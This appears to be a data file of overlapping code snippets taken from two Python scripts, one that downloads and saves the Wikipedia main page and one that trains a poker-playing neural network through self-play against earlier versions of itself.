"page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) #",
"\"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl:",
"# Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with",
"# downoad web page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data =",
"urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html",
"data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\"))",
"downoad web page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read()",
"= request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\")",
"import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save",
"request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File",
"file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with name (current directory):",
"html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with name (current",
"web page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\"))",
"as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file",
"url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\")"
] |
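The row above windows over one short script; read end to end, the fragments amount to the following sketch of the same fetch-and-save flow with urllib.request (writing the decoded HTML next to the script):

# download web page
import urllib.request as request

url = "https://en.wikipedia.org/wiki/Main_Page"
data = request.urlopen(url).read()
print(data.decode("utf8"))

# Save html file
with open("data.html", "w") as fl:
    fl.write(data.decode("utf8"))

print("\n\nFinish")
print("File saved with name (current directory): data.html\n")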
[
"hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment",
"state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0,",
"print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name =",
"action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case of",
"Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20 for i",
"training model. Continue where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if",
"= m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\",",
"rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds,",
"+ \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level +=",
"training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act)",
"training_model.save_weights(file_name) next_level += 1 # Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0)",
"append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0],",
"off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j",
"[100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000",
"[] actions = [] winnings = [] #saldos = [] go_to_next_level = True",
"[] #saldos = [] go_to_next_level = True # Play against opp models for",
"training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j in",
"< len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0,",
"training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model,",
"state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\",",
"= [] all_actions = [] all_winnings = [] hand_saldo = [] while state.status",
"1), 2)) for st in states: all_states.append(st) for act in actions: all_actions.append(act) for",
"m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case of fold we can",
"hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions",
"winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time()",
"range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0,",
"f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds,",
"gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0:",
"training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models",
"level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model",
"True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level = 4",
"opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\",",
"rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if",
"score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\")",
"j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs *=",
"for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = []",
"file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model to opponent models",
"file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\",",
"all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\")",
"f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went",
"> max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where last",
"state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind],",
"range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn, saldo",
"params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20 for i in",
"playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if",
"num_hands = 4000 what_if_play = True do_training = True training_epochs = 30 #",
"ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1)",
"winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act]",
"do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next",
"and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\",",
"print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\") winn = [0, 0]",
"first fold:\", hand_saldo) # randomize new action and continue playing... [action, action_ind], ammount",
"at the moment of first fold:\", hand_saldo) # randomize new action and continue",
"= 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models =",
"opp_names = [] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if",
"else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\")",
"= 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states =",
"= all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand()",
"import action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while",
"== 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] =",
"winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\",",
"/= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score:",
"if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action,",
"all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]]",
"+ 1), 2)) for st in states: all_states.append(st) for act in actions: all_actions.append(act)",
"all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\")",
"state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0,",
"max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states",
"file=f) f.flush() states = [] actions = [] winnings = [] #saldos =",
"= [0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions,",
"go_to_next_level = True # Play against opp models for j in range(len(opp_models)): print(\"Playing",
"ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case of fold",
"0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0:",
"ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo",
"rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False #",
"******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn)",
"ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states):",
"[] hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act == 0: [action,",
"num_hands, what_if_play): all_states = [] all_actions = [] all_winnings = [] total_saldo =",
"return models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model =",
"for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st,",
"winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \",",
"load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"],",
"def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id =",
"playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold -",
"per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved",
"is_fake_action = False # In case of fold we can continue playing... if",
"saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time",
"\"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters =",
"all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id])",
"what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] /",
"\"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states),",
"in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /=",
"----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions,",
"print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo)",
"opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" +",
"total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1",
"m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\",",
"0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128,",
"opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo)",
"Continue where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now",
"print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per",
"print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0]",
"\"\\n\", file=f) f.flush() states = [] actions = [] winnings = [] #saldos",
"time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level =",
"and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\") winn =",
"= time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands,",
"len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind]",
"epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time",
"action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\",",
"(i + 1), 2)) for st in states: all_states.append(st) for act in actions:",
"act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1]",
"return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play):",
"training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs =",
"\", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected",
"= [] hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act == 0:",
"models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make",
"\", len(all_states), \" data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def",
"model. Continue where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training:",
"\",\", round(total_saldo[1] / (i + 1), 2)) for st in states: all_states.append(st) for",
"training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\",",
"[] go_to_next_level = True # Play against opp models for j in range(len(opp_models)):",
"winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo",
"states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] +=",
"do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs #if",
"[0]) num_iters = 50000 num_hands = 4000 what_if_play = True do_training = True",
"print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\") return all_states, all_actions, all_winnings,",
"next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training",
"0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act]",
"1), 2), \",\", round(total_saldo[1] / (i + 1), 2)) for st in states:",
"print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings,",
"in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions = []",
"hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand",
"go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name,",
"len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state",
"ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0:",
"file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0):",
"= open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name",
"states: all_states.append(st) for act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0]",
"last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f)",
"if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym =",
"training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn)",
"for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100:",
"vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\"",
"load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models,",
"hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]])",
"= [] winnings = [] #saldos = [] go_to_next_level = True # Play",
"winnings = [] #saldos = [] go_to_next_level = True # Play against opp",
"action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings)",
"\"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f)",
"randomize new action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size,",
"opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new",
"training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0)",
"while state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0,",
"start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time()",
"opp_name.pop(0) # Make new training model. Continue where last one left off training_model",
"as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) <",
"= False # In case of fold we can continue playing... if (action",
"if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final",
"- start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds",
"rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where last one left off",
"round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] / (i + 1), 2))",
"print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0, 0]",
"rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\")",
"\"seconds per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name)",
"= [] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i]",
"import time from load_gym import load_gym import action_helpers as ah import dl_model_1 as",
"4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush()",
"total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \",",
"[0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn)",
"num_iters = 50000 num_hands = 4000 what_if_play = True do_training = True training_epochs",
"for st in states: all_states.append(st) for act in actions: all_actions.append(act) for winn in",
"st in states: all_states.append(st) for act in actions: all_actions.append(act) for winn in winnings:",
"0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands =",
"what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\") winn = [0,",
"real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2 start_time =",
"(i + 1), 2), \",\", round(total_saldo[1] / (i + 1), 2)) for st",
"[state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym,",
"round(total_saldo[1] / (i + 1), 2)) for st in states: all_states.append(st) for act",
"model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0)",
"all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states =",
"opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model.",
"+= saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i +",
"print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1,",
"- randomizing action ******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] =",
"action ******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\",",
"start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per",
"what_if_play): state = gym.startHand() all_states = [] all_actions = [] all_winnings = []",
"= load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name =",
"training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names",
"\"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) +",
"rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym()",
"hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1,",
"= [] all_winnings = [] total_saldo = [0, 0] for i in range(num_hands):",
"all_states.append(st) for act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /=",
"print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All",
"num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot",
"!= \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0)",
"print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1,",
"id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1,",
"# Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20 for",
"model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions =",
"per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and",
"elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time /",
"print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0,",
"len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand",
"= 4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f)",
"action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action",
"f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model to opponent models opp_models.append(training_model)",
"# Make new training model. Continue where last one left off training_model =",
"- state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\",",
"= -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\", hand_saldo) # randomize",
"[] total_saldo = [0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \", i)",
"\"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j],",
"0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the",
"saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] +=",
"from load_gym import load_gym import action_helpers as ah import dl_model_1 as m1 def",
"the moment of first fold:\", hand_saldo) # randomize new action and continue playing...",
"len(all_states), \" data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths,",
"* elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\",",
"= True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level =",
"if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing",
"in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn,",
"(action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action",
"real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) +",
"opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play",
"continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True",
"# Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) >",
"print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions = [] winnings =",
"round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name =",
"of fold we can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\",",
"0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0],",
